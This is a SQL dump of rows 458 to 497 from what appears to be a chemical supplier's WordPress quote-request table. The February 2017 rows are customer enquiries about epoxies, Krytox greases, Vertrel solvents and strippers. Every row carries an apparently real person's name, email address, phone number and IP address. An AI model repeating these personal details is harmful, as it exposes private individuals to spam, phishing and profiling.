INSERT INTO `wp_enquiry_detail_new` VALUES (458, 'Marco Giorgi ', 'procurement.fidi@libero.it', 'Italian company interested to buy directly form you \nplease send quote asap.\nwe require 2/3 of RSL \nplease advice about shipping renstriction if any applicable \nregards ', '+393471159638', 'RFQ MILLER STEPHENSON MS-122 AD', '77.43.30.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 16:42:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (459, 'Mia Carper', 'mcarper@rainierrubber.com', 'may I have price and lead time for a case ( 12? ) of MS-122AVL 14oz aerosol cans\n\nthank you.', '425227-4500', 'RFQ: MS-122AVL', '64.122.106.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2769";s:5:"title";s:9:"MS-122AVL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_389699368.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 18:56:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (460, 'SCOTT MATHISEN', 'smathisen@usbr.gov', 'Good Morning\'\nI need to get a Government Quote for 336 Cans \n\nTAX EXEMPT\n\nThank You Very Much. ', '509633-9338', 'GOVERNMENT QUOTE', '140.218.136.102', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:3:"336";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 19:28:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (461, 'Donald Stewart', 'dstewart@rbcbearings.com', 'What size tube or quantity is being quoted?', '', '', '23.31.226.193', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"823";s:5:"title";s:7:"GPL 216";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_333094712.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 19:34:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (462, 'Will Johnson', 'wjohnson@michaero.com', 'Please provide a price for a bottle of MS-111 epoxy stripping agent', '734975-8777', 'MS-111 price', '96.88.148.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 20:15:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (463, 'Sue Strugnell', 'sstrugnell@nationalaperture.com', 'Please email quote for a 1 quart bottle as soon as possible!\nThank you', '603893-7393', 'Quote request', '96.89.228.169', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 20:21:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (464, 'Zach Stephens', 'zachary.stephens@ssitech.com', 'Hello,\n\nCould I please get a quote for 3 5gallon container of the MS-111 Epoxy Stripping Agent.', '608344-0983', 'Price Inquiry', '12.175.17.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-01 20:38:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (465, 'Howard Feldmesser', 'howard.feldmesser@jhuapl.edu', 'Please quote price and delivery for small quantities of the stripping agent.\nIs this available from distributors or do we buy direct?', '443778-8963', 'MS-111', '128.244.87.129', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-02 16:02:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (466, 'Jeff Ruggiero', 'jeffr@cecvp.com', 'Hello, I\'d like a quote for the smallest quantity you have of the MS-111.\nThanks,\nJeff', '626938-0200', 'RFQ and questions', '65.244.224.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-02 16:36:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (467, 'Ann Romano', 'aromano@accutroninc.com', 'Good Afternoon,\nIs it possible to buy one 16 ounce aerosol can of MS-470C from you?  If so, please advise pricing.\nThank You,\nAnn\nAccutron, Inc.', '860602-0227', 'MS-470C', '96.67.38.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-02 17:37:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (468, 'Robiya ', 'Umida2008@live.nl', 'Hallo,\nI am doing a project for my school and I need to use about 100 ml of Heloxy 71 for it.  Can I order it from you about 100 ml or do I have to buy at least a quart?  How much is it?\n', '+31637171192', '', '92.110.75.143', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1230";s:5:"title";s:12:"HELOXY™ 71";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-71.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-02 19:07:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (469, 'VINCENT SCURRIA', 'vscurria@moog.com', ' could you supply me with a tds ?', '610328-4000', 'vertrel xf', '134.24.147.249', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 15:17:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (470, 'vince scurria', 'vscurria@moog.com', 'need quote on this chemical. thanks', '610328-4000', ' vertrel xf', '134.24.147.249', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 17:39:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (471, 'Jesse Lang', 'j1lang@sdcomposites.com', 'Looking to quote 7500g of Epon 862.', '858935-6641', 'Quote', '64.73.228.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 18:12:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (472, 'Jesse Lang', 'jlang@sdcomposites.com', 'Looking to quote 1 gallon of the Epikure Curing Agent W.', '858935-6641', 'Quote', '64.73.228.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 18:23:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (473, 'Jesse Lang', 'jlang@sdcomposites.com', 'Looking to quote 2 gallons of Epon 862.', '858935-6641', 'Quote', '64.73.228.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 18:25:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (474, 'Jesse Lang', 'jlang@sdcomposites.com', 'Looking to quote 2 gallons of Epon 862.', '858935-6641', 'Quote', '64.73.228.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 18:25:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (475, 'Mary Davinich', 'mdavinich2@williams-int.com', 'I need to order a case of the AeroDuster.', '248624-5200', 'need to order', '50.200.75.129', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-03 20:27:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (476, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asedada', '917370-5939', 'chris this works', '50.169.26.127', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"400";s:5:"title";s:21:"ReleaSys 82 (Aerosol)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-04 15:27:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (477, 'Michael Klos', 'michael@klos.com', 'Need a coding for electronic boards to be in outside residential A/C units. ', '603714-4305', 'Information Inquiry ', '64.37.10.139', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-05 18:26:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (478, 'MOHIT AGRAWAL', 'vividha_links@yahoo.com', 'We require Krytox GPL 103 in 1.1 Lb pack Qty 30 packs in India. Kindly send your lowest quote with other techno-commercial terms at the earliest.\n\nThanks\nFor VIVIDHA Industrial Market Links  ', '+919314921670', 'Require Krytox GPL 103', '116.202.250.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:2:"30";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-06 11:27:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (479, 'Miss Lumbini Tammita', 'lumbini.tammita@renishaw.com', 'Hello,\n\nI am interested in purchasing a sample of MS-111 Epoxy Stripping Agent. I work for a company called Renishaw based in the UK. Do you have any suppliers in the UK/Europe that I can order your product through?\n\nIn the event that you don\'t, is it possible to have this shipped to the UK? Could you kindly provide me with a quote for this?\n\nI am unable to enter my UK number in the form as it generates an error.  The correct number is 00441453522657.\n\nMany thanks.\n\nSincerely,\nLumbini', '800352-2657', 'Ordering from the UK', '195.2.244.193', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-06 13:28:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (480, 'Caleb Lund', 'caleb@a3d.tech', 'At what price(s) and quantity(ies) do you sell Krytox 1514 vacuum oil?', '972883-7124', 'Krytox 1514', '129.110.242.49', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"944";s:5:"title";s:8:"VPF 1514";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_462371947.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-06 16:21:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (481, 'Christopher Forshaw', 'chris@kalawsky.com', 'Please give me a quote on a 4oz tube of GPL 215, with shipping to BC. V1N 2W4', '250365-2155', 'price quote', '184.71.96.70', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"822";s:5:"title";s:7:"GPL 215";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_60848668.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-06 18:16:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (482, 'Kimberly', 'ksaviers@purdue.edu', 'Please send a quote for Epon 862/epicure W. We are a small academic research lab, so need a small amount ~ 1kg.', '', '', '128.210.106.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-06 21:25:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (483, 'Cody Toboz', 'ctoboz@synapsebiomedical.com', 'Can you please quote 1 gallon?\nThank you', '440315-7824', '', '104.152.99.8', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2344";s:5:"title";s:12:"Vertrel X-Si";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_470033000.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 16:18:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (484, 'Blake', 'BlakeCavanauhg93@gmail.com', 'I was trying to find the Safety Data Sheet for your Quik-Freeze MS 242-N product. Can you please email me a pdf. file to the email provided?\nThank you\nBlake Cavanaugh', '', 'Quik-Freeze MS 242N', '73.247.246.59', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 16:21:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (485, 'Maggie Williams', 'vickintercorp@outlook.com', 'Hi,\n\nCan you please quote the \nKrytox 240AC\nsize:  2oz tube\nQty:  2', '713467-1900', 'RFQ-Krytox 240AC', '73.136.197.122', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 16:25:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (486, 'Sarah Messier', 'sarah.a.messier@nasa.gov', 'My company\'s name is KPLSS and we would like to order a bulk amount of about 20-30 , 2OZ tubes of KRYTOX 240AC. We are hoping that the pricing would be much better if bought in bulk.\nThank you for your quote.', '321313-8040', 'Bulk Pricing', '128.159.74.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 18:27:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (487, 'Jill Urban', 'jurban@wakehealth.edu', 'Hello, I would like to rush order 1 bottle of MS-462H conformal coating. \nThank you\nJill ', '336716-0947', '', '152.11.93.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 19:19:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (488, 'bill feehan', 'bfeehan@dynalab-inc.com', 'I would like to request a quot for 5 gallons of HEXION	EPON RESIN 828, can you also let me know if you have any higher qty price breaks, thanks', '614729-6143', 'HEXION	EPON RESIN 828', '162.213.12.164', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 21:27:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (489, 'Marvin Sylvester', 'msylvester@miinet.com', 'Please Quote 1 bottle for us.', '818894-7111', '', '74.62.144.228', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-07 22:06:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (490, 'Colby Wu', 'colbywu@stratusplastics.com', 'Hello,\n\n  Interested in this product and wondering what are the quanities and pricing that they come in.  Would be interested in bulk for injection molding purposes.', '519566-9998', 'Pricing', '198.48.183.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-08 01:26:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (491, 'Erik Falk-Petersen ', 'Erik.falk-petersen@flir.com', 'Hi, can you provide us with a sample or small quantity of Krytox AUT 2E45 grease? \n\nBest regards, \nErik', '+4790850750', 'Krytox AUT 2E45', '37.253.209.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"717";s:5:"title";s:8:"AUT 2E45";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_97401731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-08 09:01:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (492, 'Tony Brady', 'Tony.Brady@innalabs.com', 'Could I please get a quote for 1 quart of MS-111 Epoxy Stripping Agent.', '+35318096219', 'Quote', '31.216.232.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-08 15:30:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (493, 'jeff george', 'jgeorge@sc360.com', 'to clean PLA plastic form heat break in 3d printer', '519497-1886', 'need some', '99.245.215.134', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-08 16:07:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (494, 'Ian Cummings', 'icumming@harris.com', 'Does this epoxy contain any microspheres or other agent to maintain a constant bond gap? If so what is this gap?\n\nThank You', '585269-5046', 'MS-907 Technical Question', '10.36.14.233', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-08 18:18:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (495, 'doug', 'futuremfg@gmail.com', 'Please quote the price for 1-5 cases.', '585490-1995', 'price', '50.48.233.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-09 13:54:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (496, 'BRIAN', 'bken8@windstream.net', 'What is the price on this epoxy?', '402224-8145', '', '98.19.57.85', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-09 22:47:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (497, 'Ahmed Abdelrahman', 'arahman@exigencetechnologies.com', 'Hi there,\n\nI would like to order four 25G bottles (total100G) of VAZO 67 (AMBN).\n\nOur Company Labs are in Winnipeg, Manitoba, CANADA.\n\nI would like to have the information on how to order it.\n\nRegards, \n\nAhmed', '204890-8085', 'Vazo 67', '64.4.75.142', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"575";s:5:"title";s:7:"VAZO 67";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-67-composites.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-09 23:00:51', '', NULL, '', '', '', NULL, '', ''); 
